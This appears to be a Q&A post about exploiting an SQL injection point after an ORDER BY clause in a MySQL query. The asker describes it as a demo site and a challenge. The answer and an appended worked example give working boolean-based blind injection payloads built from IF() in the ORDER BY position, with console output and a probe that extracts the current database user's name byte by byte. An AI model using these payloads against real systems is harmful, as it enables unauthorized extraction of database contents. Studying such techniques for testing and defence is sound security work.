Thursday 15 August 2013

mysql - Crafting a query for Blind SQL Injection


I have found that my demo website is vulnerable to SQL injection (I am currently doing a CH).

The injection point of the search is as follows:

  SELECT column_1, column_2, column_3 FROM table_1 WHERE column_4 = '3' ORDER BY id **injection point**

Now I need to craft a query that can help me exploit this injection point which I have found. As far as I know, UNION will not work after the ORDER BY. However, I think blind SQL injection can work on this table, like:

  SELECT column_1, column_2, column_3 FROM table_1 WHERE column_4 = '3' ORDER BY id [if 1 = 1 then 1, else empty]

Now if the injection yields 1 then the query returns an error, though if it is empty the query will execute ... THUS blind SQL injection works.

Can someone please help me craft the query, with IF in SQL or with PL if that can help, because I do not know how to use IF in SQL.

I tried to do this injection but it did not work:

  (IF (1 = 2) then 1 endif)

Full query:

  SELECT column_1, column_2, column_3 FROM `table_1` WHERE `column_4` = '[*available injection point*]' ORDER BY id [*available injection point*] ASC LIMIT [*available injection point*], [*available injection point*]

If id is not in the result set and there is another column whose values are unique per id, you can do the following:

  1. Identify how the order of the unique_per_id values relates to the order of the id (use DESC only if necessary).
  2. Boolean-based blind injection is then possible with if(1 = 1, unique_per_id, id).

    Example:

      mysql> select host, user from mysql.user order by user;
      +-----------+------+
      | host      | user |
      +-----------+------+
      | localhost | root |
      | 127.0.0.1 | root |
      +-----------+------+
      2 rows in set (0.00 sec)

      mysql> select host, user from mysql.user order by host;
      +-----------+------+
      | host      | user |
      +-----------+------+
      | 127.0.0.1 | root |
      | localhost | root |
      +-----------+------+
      2 rows in set (0.00 sec)

      mysql> select host, user from mysql.user order by if(1 = 1, host, user);
      +-----------+------+
      | host      | user |
      +-----------+------+
      | 127.0.0.1 | root |
      | localhost | root |
      +-----------+------+
      2 rows in set (0.00 sec)

      mysql> select host, user from mysql.user order by if(1 = 0, host, user);
      +-----------+------+
      | host      | user |
      +-----------+------+
      | localhost | root |
      | 127.0.0.1 | root |
      +-----------+------+
      2 rows in set (0.00 sec)

    So whenever the order produced by order by if(expr, host, user) is the same as the order by host (second query), the condition expr was true.
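A reproducible version of the ordering oracle, added here as an illustration and not taken from the question or the answer: the table and column names follow the query in the question, but the row values, the injected conditions and the final probe are invented. The probe assumes MySQL's CURRENT_USER(), ASCII() and SUBSTRING() functions and goes one step beyond the answer by turning the oracle into a byte-extraction question.

```sql
-- Added example (not from the original question or answer). Table and
-- column names follow the question; row values are constructed.
CREATE TABLE `table_1` (
  id       INT PRIMARY KEY,
  column_1 VARCHAR(20),   -- unique per id: the "unique_per_id" column of the answer
  column_2 VARCHAR(20),
  column_3 VARCHAR(20),
  column_4 VARCHAR(10)
);

INSERT INTO `table_1` VALUES
  (1, 'delta',   'x', 'x', '3'),
  (2, 'alpha',   'x', 'x', '3'),
  (3, 'charlie', 'x', 'x', '3'),
  (4, 'bravo',   'x', 'x', '3');

-- Baseline (no injection): ORDER BY id gives delta, alpha, charlie, bravo.
SELECT column_1, column_2, column_3 FROM `table_1`
 WHERE `column_4` = '3' ORDER BY id ASC LIMIT 0, 10;

-- Reference ordering for the "true" branch: ORDER BY column_1 gives
-- alpha, bravo, charlie, delta. This is the answer's step 1: learn how
-- the unique_per_id order differs from the id order.
SELECT column_1, column_2, column_3 FROM `table_1`
 WHERE `column_4` = '3' ORDER BY column_1 ASC LIMIT 0, 10;

-- Step 2, payload in the ORDER BY slot: if(<cond>, column_1, id).
-- cond true  -> column_1 order: alpha, bravo, charlie, delta
-- cond false -> id order:       delta, alpha, charlie, bravo
SELECT column_1, column_2, column_3 FROM `table_1`
 WHERE `column_4` = '3' ORDER BY IF(1 = 1, column_1, id) ASC LIMIT 0, 10;

SELECT column_1, column_2, column_3 FROM `table_1`
 WHERE `column_4` = '3' ORDER BY IF(1 = 0, column_1, id) ASC LIMIT 0, 10;

-- Extraction: swap the constant condition for a predicate about the data
-- you want. Each request answers one yes/no question; this one tests
-- whether the first byte of the connected user name is above 'm' (109),
-- which is one step of a binary search over the byte's value.
SELECT column_1, column_2, column_3 FROM `table_1`
 WHERE `column_4` = '3'
 ORDER BY IF(ASCII(SUBSTRING(CURRENT_USER(), 1, 1)) > 109, column_1, id) ASC
 LIMIT 0, 10;
```

Two practical checks before relying on this oracle. First, IF() coerces both branches to one type: when one branch is a string column, integer ids are compared as strings, so id 10 sorts before id 2. That is why the answer compares each probe against the true-branch ordering (order by the unique column) rather than against the original id ordering; in the sample above the ids stay below 10, so both orderings are the ones stated in the comments. Second, the oracle only works if the two orderings actually differ within the rows the LIMIT returns, so confirm that with a known-true and a known-false condition before spending one request per bit on the real predicate.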
